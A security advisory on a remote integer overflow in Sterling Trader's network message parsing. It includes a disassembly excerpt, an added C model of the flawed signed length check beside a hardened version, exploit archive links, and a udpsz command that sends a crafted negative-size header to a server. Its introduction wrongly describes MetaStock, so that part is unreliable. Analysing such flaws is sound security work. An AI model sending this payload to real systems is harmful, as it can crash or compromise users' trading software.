#######################################################################
Luigi Auriemma
Application: Sterling Trader
http://www.sterlingtrader.com/Trading_Platforms/trading_platforms2.html
Versions: <= 7.0.2
Platforms: Windows
Bug: integer overflow
Exploitation: remote
Date: 25 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
MetaStock is the most used and awarded software for performing
technical analysis of stocks, futures, forex, commodities, indices and
other financial instruments.
#######################################################################
======
2) Bug
======
When this program is running (Base.exe or Elite.exe) it listens on the
first available TCP port, which changes on each run, and it is affected by
an integer overflow vulnerability in the handling of the received message:
004922E3 > 83BF BC001000 10 CMP DWORD PTR DS:[EDI+1000BC],10
004922EA . 0F8C 66010000 JL Elite.00492456
004922F0 . 8D46 0C LEA EAX,DWORD PTR DS:[ESI+C]
004922F3 . 50 PUSH EAX ; &num2
004922F4 . 8D6E 08 LEA EBP,DWORD PTR DS:[ESI+8]
004922F7 . 55 PUSH EBP ; &num1 (size)
004922F8 . 68 9C23A000 PUSH Elite.00A0239C ; "1=%d~2=%d~"
004922FD . 53 PUSH EBX
004922FE . E8 7CA44600 CALL Elite.008FC77F ; sscanf
00492303 . 83C4 10 ADD ESP,10
00492306 . 83F8 02 CMP EAX,2
00492309 . 0F85 4D010000 JNZ Elite.0049245C
0049230F . 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
00492312 . 83C2 10 ADD EDX,10 ; size + 0x10
00492315 . B9 31000000 MOV ECX,31
0049231A . 66:898E 84000000 MOV WORD PTR DS:[ESI+84],CX
00492321 . 8956 04 MOV DWORD PTR DS:[ESI+4],EDX
00492324 . C746 70 10000000 MOV DWORD PTR DS:[ESI+70],10
0049232B . 33ED XOR EBP,EBP
0049232D > 8B87 BC001000 MOV EAX,DWORD PTR DS:[EDI+1000BC]
00492333 . 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4]
00492336 . 0F8C 3E010000 JL Elite.0049247A
0049233C . 89AF C0001000 MOV DWORD PTR DS:[EDI+1000C0],EBP
00492342 . 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
00492345 . 41 INC ECX ; size + 1
00492346 . 51 PUSH ECX
00492347 . E8 C0673F00 CALL Elite.00888B0C ; malloc()
0049234C . 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
0049234F . 52 PUSH EDX
00492350 . 53 PUSH EBX
00492351 . 50 PUSH EAX
00492352 . 8946 6C MOV DWORD PTR DS:[ESI+6C],EAX
00492355 . E8 36774600 CALL Elite.008F9A90 ; memcpy
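The listing above shows the whole problem in a few instructions: the
size is read with sscanf("1=%d~2=%d~") as a signed 32-bit value, 0x10 is
added to it, the result is compared against the received length with a
signed JL, and then size+1 goes to malloc() and size goes to memcpy().
A negative size passes the length check and reaches the copy. The C
below is an added model of that decision logic (it is not the vendor's
code and copies nothing; it only reports the byte count that would reach
memcpy) next to a hardened version of the same check. The names
vulnerable_copy_len, hardened_copy_len, parse_header and MAX_MSG are
constructed for this example, and parse_header wraps the number to 32
bits explicitly to model the behaviour of %d on the 32-bit target.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* The listing adds 0x10 to the parsed size before the length check. */
#define HEADER_SLACK 0x10
/* Constructed upper bound for a sane message; the original has none. */
#define MAX_MSG      (1 << 20)

/* Model of sscanf(buf, "1=%d~2=%d~", &num1, &num2) on a 32-bit build:
   the decimal string is converted and wrapped to 32 bits, so
   "4294967279" becomes -17 (0xFFFFFFEF). Returns false unless both
   fields are present, mirroring the CMP EAX,2 / JNZ check. */
static bool parse_header(const char *msg, int32_t *num1, int32_t *num2)
{
    unsigned long long a, b;
    if (sscanf(msg, "1=%llu~2=%llu~", &a, &b) != 2)
        return false;
    *num1 = (int32_t)(uint32_t)a;
    *num2 = (int32_t)(uint32_t)b;
    return true;
}

/* Decision logic as the disassembly does it. Returns the size that
   would be handed to memcpy(), or -1 if the packet is rejected. */
int32_t vulnerable_copy_len(int32_t received_len, const char *header)
{
    int32_t size, num2;
    if (received_len < 0x10)                 /* CMP [EDI+1000BC],10 ; JL */
        return -1;
    if (!parse_header(header, &size, &num2)) /* sscanf must return 2 */
        return -1;
    /* ADD EDX,10: done in 32-bit two's complement, so -17 becomes -1 */
    int32_t total = (int32_t)((uint32_t)size + HEADER_SLACK);
    if (received_len < total)                /* signed JL: -1 never rejects */
        return -1;
    /* malloc(size + 1); memcpy(dst, src, size) would follow here */
    return size;
}

/* Hardened version: reject negative or oversized values before any
   arithmetic, then compare in unsigned space where wrap is impossible. */
int32_t hardened_copy_len(int32_t received_len, const char *header)
{
    int32_t size, num2;
    if (received_len < 0x10)
        return -1;
    if (!parse_header(header, &size, &num2))
        return -1;
    if (size < 0 || size > MAX_MSG)          /* kills the sign trick */
        return -1;
    /* size <= MAX_MSG, so this addition cannot overflow */
    if ((uint32_t)size + HEADER_SLACK > (uint32_t)received_len)
        return -1;
    return size;
}

int main(void)
{
    /* Constructed headers: a benign one and the negative-size one. */
    const char *benign = "1=50~2=0~";
    const char *bad    = "1=4294967279~2=0~";

    printf("benign, 100 bytes received: vuln=%d hardened=%d\n",
           vulnerable_copy_len(100, benign), hardened_copy_len(100, benign));
    printf("negative size, 0xffff bytes received: vuln=%d hardened=%d\n",
           vulnerable_copy_len(0xffff, bad), hardened_copy_len(0xffff, bad));
    return 0;
}
```

With the benign header both functions agree on 50 bytes. With the
wrapped value the original logic reaches memcpy() with a size of -17
(0xFFFFFFEF as an unsigned length) after malloc(0xFFFFFFF0) has already
failed, while the hardened check stops at the sign test. Treating a
length parsed from the wire as signed, and checking it only after adding
to it, is the pattern to look for when auditing similar parsers.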
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17889.zip
udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff
#######################################################################
======
4) Fix
======
No fix.
#######################################################################